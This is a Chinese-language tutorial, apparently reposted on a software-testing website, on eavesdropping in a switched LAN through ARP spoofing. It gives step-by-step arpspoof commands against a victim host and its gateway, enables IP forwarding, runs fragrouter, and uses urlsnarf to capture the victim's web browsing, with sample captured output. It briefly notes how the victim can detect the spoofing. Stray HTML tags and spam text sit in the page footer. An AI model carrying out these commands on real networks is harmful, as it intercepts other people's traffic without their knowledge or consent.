• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>
    • 軟件測試技術
    • 軟件測試博客
    • 軟件測試視頻
    • 開源軟件測試技術
    • 軟件測試論壇
    • 軟件測試沙龍
    • 軟件測試資料下載
    • 軟件測試雜志
    • 軟件測試人才招聘
      暫時沒有公告

    字號: | 推薦給好友 上一篇 | 下一篇

    交換環境下的Sniffer

    發布: 2007-6-23 19:14 | 作者:   | 來源: 中國協議分析網  | 查看: 19次 | 進入軟件測試論壇討論

    領測軟件測試網

       

    通常在局域網環境中,我們都是通過交換環境的網關上網的,在交換環境中使用NetXray或者NAISniffer一類的嗅探工具除了抓到自己的包以外,是不能看到其他主機的網絡通信的。

    但是我們可以通過利用ARP欺騙可以實現Sniffer的目的。

    ARP協議是將IP解析為MAC地址的協議,局域網中的通信都是基于MAC的。

    例如下面這樣的情況:

    在局域網中192.168.0.24和192.168.0.29都是通過網關192.168.0.1上網的,假定攻擊者的系統為192.168.0.24,他希望聽到192.168.0.29的通信,那么我們就可以利用ARP欺騙實現。

    1、首先告訴192.168.0.29,網關192.168.0.1的MAC地址是192.168.0.24

    2、告訴192.168.0.1,192.168.0.29的MAC地址是192.168.0.24。

    這樣192.168.0.29和192.168.0.1之間的數據包,就會發給192.168.0.24,也就是攻擊者的機器,這樣就可以聽到會話了。但是這么做的有一個問題,192.168.0.29發現自己不能上網了,因為原來發給192.168.0.1的數據包都被192.168.0.24接收了,而并沒有發給網關192.168.0.1。

    這時候192.168.0.24設置一個包轉發的東西就可以解決這個問題了,也就是從192.168.0.29收到的包轉發給192.168.0.1,在把從192.168.0.1收到的包發給192.168.0.29。這樣192.168.0.29根本就不會意識到自己被監聽了。

    具體實現:

    1、欺騙192.168.0.29,告訴這臺機器網關192.168.0.1的MAC地址是自己(192.168.0.24)。

    [root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.29192.168.0.1

    0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

    0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

    0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

    0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71

    0:0:21:0:0:180:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:0:21:0:0:18

    ………………………………..

    這時候對192.168.0.29的ARP欺騙就開始了。

    2、欺騙192.168.0.1,告訴網關192.168.0.29的MAC地址是自己(192.168.0.24)。

    [root@Linuxdsniff-2.3]#./arpspoof-ieth0-t192.168.0.1192.168.0.29

    0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

    0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

    0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71

    0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

    0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

    0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e

    其實在這個時候192.168.0.29是可以發現的自己被欺騙了。在CMD下面使用ARP–a命令:

    C:\WINNT>arp-a

    Interface:192.168.0.29onInterface0x1000003

    Inte.netAddressPhysicalAddressType

    192.168.0.100-50-56-40-07-71dynamic

    192.168.0.2400-50-56-40-07-71dynamic

    兩個IP地址的MAC地址居然是一模一樣的!不過很少有人會這么做:-)。

    3、設置一個包轉發

    [root@Linuxfragrouter-1.6]#./fragrouter-B1

    fragrouter:base-1:normalIPforwarding

    在這之前別忘了首先需要打開包轉發的功能

    [root@Linux/proc]#echo1>/proc/sys/net/ipv4/ip_forward

    萬事具備,可以開始SNIFFER了。

    例如想看看192.168.0.29在瀏覽什么地方:

    [root@Linuxdsniff-2.3]#./urlsnarf

    urlsnarf:listeningoneth0[tcpport80orport8080orport3128]

    Kitty[18/May/2002:20:02:25+1100]"GEThttp://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7HTTP/1.1"--"http://www.google.com/search?hl=zh-CN&ie=UTF8&oe=UTF8&q=fdfds&btnG=Google%E6%90%9C%E7%B4%A2&lr=""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

    Kitty--[18/May/2002:20:02:28+1100]"GEThttp://www.ezboard.com/ztyles/default.cssHTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

    Kitty--[18/May/2002:20:02:29+1100]"GEThttp://www1.ezboard.com/spch.js?customerid=1147458082HTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"

    當然也可以知道其他………:-)

    延伸閱讀

    文章來源于領測軟件測試網 http://www.kjueaiud.com/


    關于領測軟件測試網 | 領測軟件測試網合作伙伴 | 廣告服務 | 投稿指南 | 聯系我們 | 網站地圖 | 友情鏈接
    版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
    北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備2023014753號-2
    技術支持和業務聯系:info@testage.com.cn 電話:010-51297073

    軟件測試 | 領測國際ISTQBISTQB官網TMMiTMMi認證國際軟件測試工程師認證領測軟件測試網

    老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

  • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>

    <progress id="5koa6"></progress>

  • <strong id="5koa6"></strong>